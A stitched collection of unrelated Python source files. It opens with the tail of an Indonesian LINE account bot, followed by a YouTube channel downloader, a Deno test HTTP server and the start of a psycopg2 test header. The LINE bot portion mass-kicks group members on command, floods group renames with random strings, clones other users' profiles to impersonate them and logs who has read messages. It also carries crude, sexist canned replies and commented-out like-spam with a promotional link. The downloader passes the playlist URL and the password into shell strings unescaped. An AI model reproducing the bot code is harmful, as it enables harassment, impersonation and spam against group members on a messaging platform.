if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#==========================================
#----------------------------------------------
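# copy @: meniru profil user yang di-tag (diasumsikan CloneContactProfile menyalin nama,
# status, dan foto profil); "Backup" mengembalikan profil bot dari objek backup.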
elif "copy @" in msg.text:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
#-----------------------------------------------
elif msg.text in ["Backup","backup"]:
if msg.from_ in admin:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
elif "rejectall" in msg.text:
X = cl.getGroupIdsInvited()
for i in X:
cl.rejectGroupInvitation(i)
#--------------------------------------------------------
#-------------Fungsi Balesan Respon Start---------------------#
elif msg.text in ["Ini Apa","ini apa","Apaan Ini","apaan ini"]:
ki.sendText(msg.to,"Ya gitu deh intinya mah questioning")
#-------------Fungsi Balesan Respon Finish---------------------#
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-------------Fungsi Speedbot Start---------------------#
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
print("Speed")
start = time.time()
cl.sendText(msg.to, "Sabar Boss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sDetik" % (elapsed_time))
kk.sendText(msg.to, "%sDetik" % (elapsed_time))
ki.sendText(msg.to, "%sDetik" % (elapsed_time))
kc.sendText(msg.to, "%sDetik" % (elapsed_time))
#-------------Fungsi Speedbot Finish--------------------#
elif "Recover" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Recover", mi_d)
cl.sendText(msg.to,"Success recover")
#--------------------------------------------------------
#--------------------------------------------------------
elif msg.text in ["Remove all chat"]:
if msg.from_ in admin:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
ks.removeAllMessages(op.param2)
k1.removeAllMessages(op.param2)
k2.removeAllMessages(op.param2)
k3.removeAllMessages(op.param2)
k4.removeAllMessages(op.param2)
k5.removeAllMessages(op.param2)
cl.sendText(msg.to,"Removed all chat")
#---------------------------
#KICK_BY_TAG
elif "Boom " in msg.text:
if msg.from_ in admin:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', msg.text)
mention = eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
print mentionees
for mention in mentionees:
ki.kickoutFromGroup(msg.to,[mention['M']])
else:
cl.sendText(msg.to, "Khusus Admin")
#-------------Fungsi Banned Send Contact Start------------------#
elif msg.text in ["Ban"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
ki.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
elif msg.text in ["Unban"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
ki.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
#-------------Fungsi Banned Send Contact Finish------------------#
#-------------Fungsi Chat ----------------
elif msg.text in ["Woy","woy","Woi","woi"]:
quote = ['Istri yang baik itu Istri yang Mengizinkan Suaminya untuk Poligami 😂😂😂.','Kunci Untuk Bikin Suami Bahagia itu cuma satu..\nIzinkan Suamimu Untuk Selingkuh Coyyy ','Ah Koplak Lu','Muka Lu Kaya Jembut','Ada Orang kah disini?','Ada Janda Yang Bisa Di Ajak Mojok Gak, Euy','Ada Perawan Nganggur ga Coy?']
psn = random.choice(quote)
cl.sendText(msg.to,psn)
#-------------Fungsi Bannlist Start------------------#
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
random.choice(KAC).sendText(msg.to,"Tidak Ada Akun Terbanned")
else:
random.choice(KAC).sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Bannlist Finish------------------#
elif msg.text in ["Cek ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
random.choice(KAC).sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif "random: " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("random: ","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "albumat'" in msg.text:
try:
albumtags = msg.text.replace("albumat'","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakecat'" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakecat'","")
random.choice(KAC).sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
#===========================================
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
#------------------------------------------------------------------------------------
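# op.type 32 (dipakai di sini sebagai notifikasi kick oleh member lain): jika op.param2
# bukan bot/admin, semua bot balas menendang op.param2 dan memasukkannya ke blacklist.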
if op.type == 32:
OWN = "u350cc7408cc6cc82e056ee046131f925"
if op.param2 in Bots or op.param2 in admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
k1.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
#---------CCTV-----------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n[•]" + Name
wait2['ROM'][op.param1][op.param2] = "[•]" + Name
else:
pass
except:
pass
#---------------------
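# op.type 17: member bergabung -> kirim pesan selamat datang.
# op.type 15: member keluar -> kirim pesan perpisahan.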
if op.type == 17:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
random.choice(KAC).sendText(op.param1, "Welcome\nSelamat Datang Di " + str(ginfo.name))
random.choice(KAC).sendText(op.param1, "Founder =>>> " + str(ginfo.name) + " :\n" + ginfo.creator.displayName)
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if op.param2 in Bots:
return
random.choice(KAC).sendText(op.param1, "Kenapa left kak")
print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------
#Restart_Program
elif msg.text in ["Bot restart"]:
if msg.from_ in Creator:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
else:
cl.sendText(msg.to, "No Access")
#--------------------------------------------------------
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
#def autolike():
#for zx in range(0,500):
#hasil = cl.activity(limit=500)
#if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
#try:
#cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#k1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#k1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#k2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#k2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#k3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#k3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#print "Like"
#except:
#pass
#else:
#print "Already Liked"
#time.sleep(0.01)
#thread3 = threading.Thread(target=autolike)
#thread3.daemon = True
#thread3.start()
#--------------------
#def likePost():
# for zx in range(0,500):
# hasil = cl.activity(limit=500)
# if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
#if hasil['result']['posts'][zx]['userInfo']['mid'] in owner:
#try:
#cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k4.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k5.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#k1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#k2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#k3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#print "Like"
#except:
#pass
#else:
#print "Status Sudah di Like Boss"
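# nameUpdate(): selama wait["clock"] aktif, nama profil tiap bot diperbarui dari
# wait["cName"].."cName5" setiap 600 detik.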
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"]
cl.updateProfile(profile)
profile2 = ki.getProfile()
profile2.displayName = wait["cName2"]
ki.updateProfile(profile2)
profile3 = kk.getProfile()
profile3.displayName = wait["cName3"]
kk.updateProfile(profile3)
profile4 = kc.getProfile()
profile4.displayName = wait["cName4"]
kc.updateProfile(profile4)
profile5 = ks.getProfile()
profile5.displayName = wait["cName5"]
ks.updateProfile(profile5)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
watcher.py
|
#!/usr/bin/env python3
# coding=utf-8
'''
#-------------------------------------------------------------------------------
Project : YouTube Watcher
Module : watcher
Purpose : Track YouTube channels and download new videos
Version : 0.5.2 beta
Status : Development
Modified :
Created :
Author : Burak Tokman
Email : buraktokman@hotmail.com
Copyright : 2021, Bulrosa OU
Licence : EULA
Unauthorized copying of this file, via any medium is strictly prohibited
Proprietary and confidential
#-------------------------------------------------------------------------------
'''
from pathlib import Path
import subprocess
import threading
import datetime
import json
import time
# import pync
import sys
import os
CONFIG = { 'download' : True,
'login' : False,
'username' : '',
'password' : '',
'playlist-file' : str(Path(Path(__file__).parents[0] / 'playlist.txt')),
'history-file' : str(Path(Path(__file__).parents[0] / 'history.txt')),
'download-dir' : '/Volumes/WD/_VIDEO', # '~/Desktop/_VID'
'update-interval' : 3, # Hour
'thread-count' : 1}
# ------------------------------------------
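# update_youtube() upgrades the youtube-dl package via pip3; parse_urls() falls back to it
# when a playlist returns no videos (usually a sign youtube-dl is outdated).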
def update_youtube():
st = 'pip3 install --upgrade youtube-dl'
with subprocess.Popen(st, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) as p:
output, errors = p.communicate()
def timestamp():
now = datetime.datetime.utcnow()
output = '%.2d:%.2d:%.2d' % ((now.hour + 3) % 24, now.minute, now.second)
return output
def parse_urls(playlist):
st = 'youtube-dl -j --flat-playlist \'' + str(playlist) + '\''
with subprocess.Popen(st, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) as p:
output, errors = p.communicate()
lines = output.decode('utf-8').splitlines()
# print(lines)
urls = []
# Take first 2 videos
i=1
for url in lines:
t = json.loads(url)
# print(t['url'] + ' → ' + t['title'])
id_temp = t['url']
urls.append(id_temp)
if i == 2:
break
i+=1
# ERROR
if len(urls) == 0:
print("ERROR → No video found in playlist/channel. Update module.\npip3 install --upgrade youtube-dl")
update_youtube()
# exit()
# Return
# print( timestamp() + ' → Video count → ' + '' + str(len(urls)))
return urls
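# download_video() tries youtube-dl format codes in order (22, 136, 18 -- roughly 720p mp4,
# 720p DASH video, 360p mp4) and treats a '100%' line in the output as a successful download.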
def download_video(url):
global CONFIG
# Check if download dir is available
if not os.path.isdir(CONFIG['download-dir']):
print(' → CAUTION → ' + 'Download dir not available. ~/Desktop used as default')
CONFIG['download-dir'] = '~/Desktop'
# youtube-dl -f 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/bestvideo+bestaudio' --merge-output-format mp4
formats = ['22', '136', '18']
download_status = False
for format_temp in formats:
if CONFIG['login'] == True: login_temp = '-u ' + str(CONFIG['username']) + ' -p ' + CONFIG['password']
else: login_temp = ''
st = 'cd ' + CONFIG['download-dir'] + '&& youtube-dl ' + str(login_temp) + ' -f ' + format_temp + ' http://www.youtube.com/watch?v=' + str(url)
lines = os.popen(st).read()
if '100%' in lines:
download_status = True
break
# elif 'ERROR' in lines:
# Return
return download_status
def check_new_urls(urls):
global CONFIG
with open(CONFIG['history-file']) as f:
content = f.readlines()
content = [x.strip() for x in content]
# print(content)
urls_new = []
for url in urls:
if url not in content:
urls_new.append(url)
return urls_new
def write_to_history(url):
global CONFIG
with open(CONFIG['history-file'], 'a') as f:
f.write(url + '\n')
def load_playlists():
global CONFIG
with open(CONFIG['playlist-file'], encoding='utf-8') as f:
content = f.readlines()
temp_list = [x.strip() for x in content]
playlist = []
for line in temp_list:
temp_line = line.split(',')
temp_dict = {'name' : temp_line[0], 'url' : temp_line[1]}
playlist.append(temp_dict)
return playlist
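# process_playlists() is the per-thread worker: skip entries whose name contains '#',
# fetch the first two playlist entries (typically the newest uploads), filter them against
# history.txt, then download, notify and append each new id to the history file.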
def process_playlists(playlists):
global CONFIG
for playlist in playlists:
time_start_temp = time.time()
if '#' in playlist['name']:
print( timestamp() + ' → WATCHER → ' + 'SKIPPING > ' + str(playlist['name']))
continue
else:
print( timestamp() + ' → WATCHER → ' + '' + str(playlist['name']))
# Get video URLs from playlist
print( timestamp() + ' → ' + 'Fetching URLs ...')
urls = parse_urls(playlist['url'])
# Compare w/ history & Select new URLs
# print( timestamp() + ' → Selecting new videos ...')
urls = check_new_urls(urls)
if len(urls) == 0:
print( timestamp() + ' → WATCHER → ' + 'No new video (' + str(round((time.time() - time_start_temp), 2)) + 's)\n' + '• • •')
else:
# Process
for url in urls:
# Download
print( timestamp() + ' → WATCHER → ' + 'Downloading → ' + str(url))
if CONFIG['download'] == True:
r = download_video(url)
else:
r = True
# Get Video Title
command = 'youtube-dl --get-title http://www.youtube.com/watch?v=' + str(url)
try:
if CONFIG['download'] == True:
title = subprocess.check_output(command, shell=True).decode('utf-8')
title = title.replace('\n', '') # Trim
except Exception as e:
print(timestamp() + ' → ERROR → Can\'t get video title')
print(str(e))
title = 'New video'
print( timestamp() + ' → WATCHER → ' + '' + str(title))
# Notify
try:
if CONFIG['download'] == True:
title = playlist['name'] + ' → ' + title
# pync.notify(title, appIcon=str(Path(Path(os.path.abspath(__file__)).parents[0] / 'youtube.png'))) # title='New Video' # youtube.png
except Exception as e:
print(timestamp() + ' → ERROR → Notification error')
if r == True:
# Log
write_to_history(url)
print( timestamp() + ' → WATCHER → ' + 'Written to history → ' + str(url) + '\n')
else:
                    print(timestamp() + ' → ERROR → Cannot download video')
print( timestamp() + ' → WATCHER → ' + 'Thread finished')
    # exit() raises SystemExit, which quietly ends this worker thread
    exit()
# try:
# print(error)
# except Exception as e:
# raise
# ------------------------------------------
def main():
global CONFIG
time_start = time.time()
# Load Playlists from file
playlists = load_playlists()
# Divide playlists for threads
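    # Round-robin split, e.g. 5 playlists over 2 threads -> [[p0, p2, p4], [p1, p3]]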
playlists = [playlists[i::CONFIG['thread-count']] for i in range(CONFIG['thread-count'])]
# Define threads
threads = []
for x in range(0, CONFIG['thread-count']):
print( timestamp() + ' → WATCHER → ' + 'THREAD ' + str(x) + ' → Configured')
thread_name = 'T' + str(x) + '-youtube-watcher'
t = threading.Thread(name=thread_name, target=process_playlists, args=(playlists[x], ))
threads.append(t)
# Start threads
for x in range(0, CONFIG['thread-count']):
print( timestamp() + ' → WATCHER → ' + 'THREAD ' + str(x) + ' → Started')
threads[x].start()
# Wait threads
# for x in range(0, CONFIG['thread-count']):
# print( timestamp() + ' → WATCHER → ' + 'Waiting thread ' + str(x) + ' to finish')
# threads[x].join()
# print( timestamp() + ' → WATCHER → ' + 'Thread ' + str(x) + ' finished')
# print( timestamp() + ' → WATCHER → ' + 'Channels processed (' + str(i) + ' / ' + str(len(playlists)) + ') [' + str(round((time.time() - time_start) / 60, 2)) + 'm]\n' + '• • •')
if __name__ == '__main__':
main()
# time_left = UPDATE_INTERVAL
# done = False
# while True:
# main()
# while not done:
# time_left = time_left - (10 / 60 / 60)
# st = '{} Scan completed. Next loop in {:.2f} hours'.format(timestamp(), round(time_left, 3))
# print(st, end='\r')
# time.sleep(10)
# if time_left <= 0:
# print()
# done = True
# import youtube_dl
# download_video('8yB_UEVwuRM')
# input_file = load_playlists()
# for video in input_file:
# print(video)
# ydl_opts = {
# 'ignoreerrors': True}
# with youtube_dl.YoutubeDL(ydl_opts) as ydl:
# info_dict = ydl.extract_info(video, download=False)
# for i in info_dict:
# video_thumbnail = info_dict.get("thumbnail"),
# video_id = info_dict.get("id"),
# video_title = info_dict.get("title"),
# video_description = info_dict.get("description"),
# video_duration = info_dict.get("duration")
|
http_server.py
|
#!/usr/bin/env python
# Copyright 2018 the Deno authors. All rights reserved. MIT license.
# Many tests expect there to be an http server on port 4545 serving the deno
# root directory.
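# Example of the assumed usage from tests (illustrative only): fetch
# http://localhost:4545/<path> to read a file from the repo root, or hit
# port 4546 to receive a 301 redirect back to the main server.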
import os
import sys
from threading import Thread
import SimpleHTTPServer
import SocketServer
from util import root_path
from time import sleep
PORT = 4545
REDIRECT_PORT = 4546
def server():
os.chdir(root_path) # Hopefully the main thread doesn't also chdir.
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
SocketServer.TCPServer.allow_reuse_address = True
s = SocketServer.TCPServer(("", PORT), Handler)
print "Deno test server http://localhost:%d/" % PORT
return s
def redirect_server():
os.chdir(root_path)
target_host = "http://localhost:%d" % PORT
class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(301)
self.send_header('Location', target_host + self.path)
self.end_headers()
Handler = RedirectHandler
SocketServer.TCPServer.allow_reuse_address = True
s = SocketServer.TCPServer(("", REDIRECT_PORT), Handler)
print "Deno redirect server http://localhost:%d/ -> http://localhost:%d/" % (
REDIRECT_PORT, PORT)
return s
def spawn():
# Main http server
s = server()
thread = Thread(target=s.serve_forever)
thread.daemon = True
thread.start()
# Redirect server
rs = redirect_server()
r_thread = Thread(target=rs.serve_forever)
r_thread.daemon = True
r_thread.start()
sleep(1) # TODO I'm too lazy to figure out how to do this properly.
return thread
if __name__ == '__main__':
try:
thread = spawn()
while thread.is_alive():
sleep(10)
except KeyboardInterrupt:
pass
sys.exit(1)
|
test_cancel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# test_cancel.py - unit test for query cancellation
#
# Copyright (C) 2010-2011 Jan Urbański <wulczer@wulczer.org>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
